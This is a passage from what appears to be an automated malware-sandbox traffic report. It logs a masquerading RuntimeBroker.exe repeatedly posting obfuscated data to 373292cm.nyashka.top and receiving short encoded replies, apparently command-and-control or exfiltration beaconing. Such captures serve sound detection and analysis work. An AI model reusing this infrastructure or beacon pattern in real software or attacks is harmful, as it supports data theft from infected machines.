                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:02.301491976 CET2544OUTData Raw: 5f 5d 5c 54 54 47 54 5b 5b 5f 5a 51 59 55 58 56 57 5e 5d 5a 57 5c 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _]\TTGT[[_ZQYUXVW^]ZW\S_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/'B#><\46+.+>.=+,47Q W0W()?]#;>&F$.Y/-
                                                                                  Jan 11, 2025 06:44:02.585850000 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:02.720432043 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:02 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  55192.168.2.65709037.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:02.852229118 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:03.207761049 CET2544OUTData Raw: 5a 55 5c 57 54 49 51 59 5b 5f 5a 51 59 53 58 5e 57 5b 5d 53 57 5d 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZU\WTIQY[_ZQYSX^W[]SW]SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.\/+B">; 9\+>?(%^+##(74!;.&F$.Y/5
                                                                                  Jan 11, 2025 06:44:03.485198975 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:03.615292072 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:03 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  56192.168.2.65709137.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:03.744276047 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:04.098382950 CET2544OUTData Raw: 5a 50 5c 56 54 42 54 5e 5b 5f 5a 51 59 5e 58 5e 57 59 5d 53 57 5f 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZP\VTBT^[_ZQY^X^WY]SW_SU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.Y,0#">8X >*[+?X9(Y43!20S(*#\73";>&F$.Y/
                                                                                  Jan 11, 2025 06:44:04.373613119 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:04.502549887 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:04 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  57192.168.2.65709237.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:04.747457027 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:05.098413944 CET2544OUTData Raw: 5f 56 59 50 54 49 51 5e 5b 5f 5a 51 59 52 58 5e 57 59 5d 5e 57 5f 53 5e 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _VYPTIQ^[_ZQYRX^WY]^W_S^\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-80'D"[#7#*)= ](\?=# <V4!+(:#" 1^..&F$.Y/1
                                                                                  Jan 11, 2025 06:44:05.388629913 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:05.560369968 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  58192.168.2.65709337.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:05.699287891 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:06.054738998 CET2544OUTData Raw: 5f 53 5c 53 54 47 54 5f 5b 5f 5a 51 59 52 58 56 57 51 5d 53 57 5d 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _S\STGT_[_ZQYRXVWQ]SW]SU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-;3!=?"0[+><]+-=)=[#7 3<_ #02/&F$.Y/1
                                                                                  Jan 11, 2025 06:44:06.348607063 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:06.482558966 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:06 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  59192.168.2.65709437.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:06.620104074 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:06.973567963 CET2544OUTData Raw: 5f 55 5c 50 51 45 51 59 5b 5f 5a 51 59 5f 58 5e 57 5f 5d 53 57 5b 53 5b 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _U\PQEQY[_ZQY_X^W_]SW[S[\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/#C"'#9)>4+>-^(-40!!+)4V%X,.&F$.Y/
                                                                                  Jan 11, 2025 06:44:07.269201994 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:07.446542978 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:07 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  60192.168.2.65709537.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:07.474689960 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1852
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:07.832870007 CET1852OUTData Raw: 5a 55 59 52 51 43 54 59 5b 5f 5a 51 59 50 58 56 57 59 5d 59 57 5b 53 5b 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZUYRQCTY[_ZQYPXVWY]YW[S[\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S._8;C"<_7 =Z>>/>-6?= 4<#!+)443:..&F$.Y/
                                                                                  Jan 11, 2025 06:44:08.110927105 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:08.244064093 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:08 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 26 57 3e 26 2d 02 32 05 27 0c 24 0a 3d 0b 29 3e 3c 06 3d 3d 22 07 24 16 3d 14 27 2e 24 51 27 28 21 5c 2b 07 3a 53 32 06 23 5a 3a 34 2b 5d 0c 13 22 5d 23 29 35 04 25 2c 06 10 2b 38 37 17 21 12 26 5c 2b 04 07 55 3c 11 30 59 28 07 0a 04 3f 03 21 0f 2f 28 3a 06 2e 0e 21 08 34 14 2b 52 0d 11 24 54 3f 3d 0f 1f 29 10 11 59 35 5e 3b 5f 24 2d 31 0d 24 31 22 56 26 29 2c 5b 31 1c 13 56 24 0f 29 50 31 38 22 5b 25 01 29 56 22 22 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: &W>&-2'$=)><=="$='.$Q'(!\+:S2#Z:4+]"]#)5%,+87!&\+U<0Y(?!/(:.!4+R$T?=)Y5^;_$-1$1"V&),[1V$)P18"[%)V""#T,"W3UV


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  61192.168.2.65709637.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:07.583159924 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:07.942400932 CET2544OUTData Raw: 5a 50 5c 51 51 45 51 5b 5b 5f 5a 51 59 51 58 54 57 50 5d 59 57 5d 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZP\QQEQ[[_ZQYQXTWP]YW]S\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.,;@!77![=4]?.^)=; ?+W#2/<:7735],&F$.Y/=
                                                                                  Jan 11, 2025 06:44:08.233850002 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:08.521922112 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:08 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  62192.168.2.65709737.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:08.649669886 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:09.004661083 CET2536OUTData Raw: 5f 51 5c 5e 51 40 51 5a 5b 5f 5a 51 59 57 58 5e 57 5c 5d 59 57 5f 53 5b 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _Q\^Q@QZ[_ZQYWX^W\]YW_S[\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/;A5<#!+=4\?*<>?"<< 0W<9840:;&F$.Y/
                                                                                  Jan 11, 2025 06:44:09.307610989 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:09.473388910 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:09 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  63192.168.2.65709837.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:09.605608940 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:09.959104061 CET2544OUTData Raw: 5a 55 5c 5e 54 42 54 58 5b 5f 5a 51 59 51 58 51 57 5e 5d 5c 57 59 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZU\^TBTX[_ZQYQXQW^]\WYS_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/ "=04)7<"? 7/7!!?:+Y #5_/.&F$.Y/=
                                                                                  Jan 11, 2025 06:44:10.234433889 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:10.407032967 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:10 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  64192.168.2.65709937.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:10.541552067 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:10.895277977 CET2544OUTData Raw: 5f 50 5c 50 54 43 54 51 5b 5f 5a 51 59 55 58 5f 57 51 5d 5b 57 5f 53 58 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _P\PTCTQ[_ZQYUX_WQ][W_SX\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.80#D5=4701)3?.]<7X4?3!1+<" :/&F$.Y/-
                                                                                  Jan 11, 2025 06:44:11.175615072 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:11.307257891 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:11 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  65192.168.2.65710037.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:11.446904898 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:11.801517010 CET2544OUTData Raw: 5f 5c 59 52 54 47 54 50 5b 5f 5a 51 59 51 58 56 57 5f 5d 5d 57 5f 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _\YRTGTP[_ZQYQXVW_]]W_SZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-. <6.7#=]=[4\<>]?>+X7<#W;+*87 ];.&F$.Y/=
                                                                                  Jan 11, 2025 06:44:12.103729963 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:12.240104914 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:12 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  66192.168.2.65710137.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:12.366627932 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:12.744771004 CET2544OUTData Raw: 5f 54 59 57 54 46 54 58 5b 5f 5a 51 59 52 58 53 57 5c 5d 5d 57 50 53 58 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _TYWTFTX[_ZQYRXSW\]]WPSX\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.\83("[;7 )[*=0^?=5(-?X#<7P ! +:84V!^8>&F$.Y/1
                                                                                  Jan 11, 2025 06:44:13.004443884 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:13.140053034 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:12 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  67192.168.2.65710237.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:13.261321068 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:13.614279032 CET1872OUTData Raw: 5a 55 5c 52 54 45 54 5c 5b 5f 5a 51 59 53 58 56 57 51 5d 5b 57 51 53 5e 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZU\RTET\[_ZQYSXVWQ][WQS^\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-. 0!$7#&*=7?.-[?[("//S#0V+ #V%_,>&F$.Y/5
                                                                                  Jan 11, 2025 06:44:13.909260035 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:14.042099953 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:13 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
